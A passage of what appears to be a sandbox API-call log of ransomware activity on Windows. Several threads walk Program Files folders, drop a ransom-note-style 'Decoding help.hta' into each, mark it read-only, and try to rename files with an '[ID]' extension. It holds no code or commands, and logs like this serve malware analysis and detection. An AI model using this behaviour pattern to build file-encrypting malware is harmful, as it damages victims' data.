NT\\TableTextService\\en-US\\*.*", lpFindFileData=0x1b7dfd30 | out: lpFindFileData=0x1b7dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228e0708, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2c30 [0045.143] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.143] FindNextFileW (in: hFindFile=0x5e2c30, lpFindFileData=0x1b7dfd30 | out: lpFindFileData=0x1b7dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x228e0708, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.143] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.143] FindNextFileW (in: hFindFile=0x5e2c30, lpFindFileData=0x1b7dfd30 | out: lpFindFileData=0x1b7dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2eda9c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2eda9c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 1 [0045.143] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*" [0045.143] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*") returned 64 [0045.143] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\Decoding help.hta" [0045.143] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\decoding help.hta")) returned 0xffffffff [0045.143] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0045.419] WriteFile (in: hFile=0x308, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b7dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b7dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.419] CloseHandle (hObject=0x308) returned 1 [0045.420] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.506] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TableTextService.dll.mui") returned -1 [0048.506] lstrlenW (lpString="TableTextService.dll.mui") returned 24 [0048.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*" [0048.506] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\*.*") returned 64 [0048.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\", lpString2="TableTextService.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" [0048.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" [0048.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0048.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows NT\\TableTextService\\en-US\\TableTextService.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\en-us\\tabletextservice.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.507] FindNextFileW (in: hFindFile=0x5e2c30, lpFindFileData=0x1b7dfd30 | out: lpFindFileData=0x1b7dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2eda9c, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2eda9c, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="TableTextService.dll.mui", cAlternateFileName="")) returned 0 [0048.507] FindClose (in: hFindFile=0x5e2c30 | out: hFindFile=0x5e2c30) returned 1 Thread: id = 424 os_tid = 0xb8c [0043.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*", lpFindFileData=0x1b91fd30 | out: lpFindFileData=0x1b91fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2c70 [0045.155] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0045.155] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x1b91fd30 | out: lpFindFileData=0x1b91fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea8d4f6, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.155] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0045.155] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0045.155] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x1b91fd30 | out: lpFindFileData=0x1b91fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb90bdeb0, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb90bdeb0, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb371d95c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0045.155] lstrcpyW (in: lpString1=0x10fe7650, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0045.155] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 70 [0045.155] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" [0045.155] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\decoding help.hta")) returned 0xffffffff [0045.155] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0045.457] WriteFile (in: hFile=0x390, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1b91fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1b91fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0045.458] CloseHandle (hObject=0x390) returned 1 [0045.458] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0048.595] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0048.595] lstrlenW (lpString="drag.png") returned 8 [0048.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.596] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 70 [0048.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" [0048.596] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" [0048.596] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.596] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x1b91fd30 | out: lpFindFileData=0x1b91fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a11cd0, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0048.596] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0048.596] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0048.596] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0048.598] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.598] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 70 [0048.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US" [0048.598] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*.*" [0048.598] GlobalMemoryStatus (in: lpBuffer=0x1b91fd10 | out: lpBuffer=0x1b91fd10) [0048.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2463d2d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x548 [0048.606] CloseHandle (hObject=0x548) returned 1 [0048.606] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x1b91fd30 | out: lpFindFileData=0x1b91fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3743abc, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xb3743abc, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd13, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0048.606] lstrcpyW (in: lpString1=0x10fe7650, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.606] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 70 [0048.606] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" [0048.606] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\decoding help.hta")) returned 0x1 [0048.607] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0048.607] lstrlenW (lpString="icon.png") returned 8 [0048.607] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.607] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 70 [0048.607] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" [0048.607] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" [0048.607] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0048.607] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x1b91fd30 | out: lpFindFileData=0x1b91fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8191f35e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8191f35e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0048.607] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0048.607] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0048.607] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0048.609] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.609] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 70 [0048.609] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images" [0048.609] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*.*" [0048.609] GlobalMemoryStatus (in: lpBuffer=0x1b91fd10 | out: lpBuffer=0x1b91fd10) [0048.610] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2466d3a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x548 [0048.622] CloseHandle (hObject=0x548) returned 1 [0048.622] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x1b91fd30 | out: lpFindFileData=0x1b91fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb443525c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0048.622] lstrcpyW (in: lpString1=0x10fe7650, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.622] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 70 [0048.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" [0048.622] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\decoding help.hta")) returned 0x1 [0048.622] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0048.622] lstrlenW (lpString="logo.png") returned 8 [0048.622] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0048.622] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned 70 [0048.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" [0048.622] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" [0048.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0048.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.873] FindNextFileW (in: hFindFile=0x5e2c70, lpFindFileData=0x1b91fd30 | out: lpFindFileData=0x1b91fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9097d51, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb9097d51, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb443525c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0049.873] FindClose (in: hFindFile=0x5e2c70 | out: hFindFile=0x5e2c70) returned 1 Thread: id = 425 os_tid = 0xb44 [0043.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*", lpFindFileData=0x1ba5fd30 | out: lpFindFileData=0x1ba5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ea6723d, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, 